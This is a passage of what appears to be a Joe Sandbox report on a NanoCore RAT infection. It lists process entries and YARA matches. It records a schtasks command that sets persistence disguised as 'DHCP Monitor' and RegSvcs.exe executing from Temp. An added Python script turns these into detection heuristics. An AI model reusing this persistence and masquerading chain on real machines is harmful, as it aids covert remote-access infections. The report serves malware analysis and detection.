              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              Antivirus matches:
              • Detection: 100%, Avira
              • Detection: 26%, ReversingLabs
              Reputation:low

              Target ID:10
              Start time:17:51:58
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0x360000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, Author: ditekSHen
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              Reputation:high

              Target ID:11
              Start time:17:52:02
              Start date:03/02/2023
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp
              Imagebase:0xef0000
              File size:185856 bytes
              MD5 hash:15FF7D8324231381BAD48A052F85DF04
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:12
              Start time:17:52:02
              Start date:03/02/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6edaf0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:13
              Start time:17:52:03
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe 0
              Imagebase:0x10000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Reputation:high

              Target ID:14
              Start time:17:52:03
              Start date:03/02/2023
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpAA3C.tmp
              Imagebase:0xef0000
              File size:185856 bytes
              MD5 hash:15FF7D8324231381BAD48A052F85DF04
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:15
              Start time:17:52:04
              Start date:03/02/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6edaf0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:16
              Start time:17:52:04
              Start date:03/02/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6edaf0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
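
The process entries above lay out the whole loader chain: the double-extension sample, wscript.exe running an encoded .vbe, ihgsvw.exe started from Temp with a .docx argument, RegSvcs.exe executing from Temp instead of its .NET Framework directory, and schtasks.exe creating the "DHCP Monitor" tasks from XML files in Temp. The Python below is an added example and not part of the Joe Sandbox report: it parses a constructed copy of five of these entries in the report's own Key:value layout and applies one heuristic per behaviour. Rule names, the .NET tool list and the extension sets are assumptions made for this illustration. The command-line tokenizer deliberately tolerates the unbalanced quote in the schtasks entries, which would make shlex raise and which is itself a small tell of how the task was spawned.

```python
"""Heuristic triage of Joe Sandbox process entries.

Added example, not part of the report.  PROCESS_BLOCKS is a constructed
copy of five of the report's entries in its Key:value layout; the rule
names, tool list and extension sets are assumptions for illustration.
"""
import re

PROCESS_BLOCKS = r"""
Target ID:0
Path:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
Commandline:C:\Users\user\Desktop\004349256789197.pdf.scr.exe

Target ID:1
Path:C:\Windows\SysWOW64\wscript.exe
Commandline:"C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe

Target ID:6
Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
Commandline:"C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docx

Target ID:10
Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe

Target ID:11
Path:C:\Windows\SysWOW64\schtasks.exe
Commandline:schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp
"""

# Assumed heuristics (not taken from the report).
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}
EXEC_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd"}
DOTNET_TOOLS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)


def parse_processes(text):
    """Turn blank-line separated 'Key:value' blocks into dicts (first colon splits)."""
    procs = []
    for block in re.split(r"\n\s*\n", text.strip()):
        proc = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")
            proc[key.strip()] = value.strip()
        procs.append(proc)
    return procs


def win_tokens(cmd):
    """Split a Windows command line without choking on an unbalanced quote."""
    return [(q or w).strip('"') for q, w in re.findall(r'"([^"]*)"|(\S+)', cmd)]


def triage_process(proc):
    """Return the heuristic tags one process entry triggers (empty list = nothing)."""
    path = proc.get("Path", "")
    image = path.rsplit("\\", 1)[-1].lower()
    args = [t.lower() for t in win_tokens(proc.get("Commandline", ""))[1:]]
    tags = []
    parts = image.split(".")
    if len(parts) > 2 and parts[-1] in EXEC_EXTS and DOC_EXTS & set(parts[1:-1]):
        tags.append("double_extension")
    if image in {"wscript.exe", "cscript.exe"} and any(a.endswith((".vbe", ".jse")) for a in args):
        tags.append("encoded_script")
    if image == "schtasks.exe" and "/create" in args and "/xml" in args:
        xml_arg = args[args.index("/xml") + 1:][:1]
        if xml_arg and TEMP_RE.search(xml_arg[0]):
            tags.append("schtasks_xml_from_temp")
    if image in DOTNET_TOOLS and "\\microsoft.net\\" not in path.lower():
        tags.append("dotnet_tool_outside_framework_dir")
    if TEMP_RE.search(path) and any(a.rsplit(".", 1)[-1] in DOC_EXTS for a in args if "." in a):
        tags.append("temp_binary_with_document_argument")
    return tags


def triage_report(text):
    """Map Target ID -> tags for every entry in a pasted report section."""
    return {p["Target ID"]: triage_process(p) for p in parse_processes(text)}
```

Each of the five constructed entries trips exactly one rule, which is the point: no single rule is damning on its own (a legitimate installer can run RegSvcs.exe, an admin can import a task from a temp XML), but five different ones firing inside a few seconds of one parent is the chain worth alerting on. The same checks translate directly into Sysmon event 1 or EDR process-creation telemetry once the report fields are mapped to Image and CommandLine.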

              Target ID:17
              Start time:17:52:06
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              Target ID:18
              Start time:17:52:07
              Start date:03/02/2023
              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
              Imagebase:0x710000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Antivirus matches:
              • Detection: 0%, ReversingLabs

              Target ID:19
              Start time:17:52:07
              Start date:03/02/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6edaf0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:20
              Start time:17:52:15
              Start date:03/02/2023
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
              Imagebase:0x7ff6f21c0000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              Target ID:21
              Start time:17:52:16
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              Target ID:22
              Start time:17:52:18
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0x350000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

              Target ID:23
              Start time:17:52:23
              Start date:03/02/2023
              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
              Imagebase:0xb80000
              File size:45152 bytes
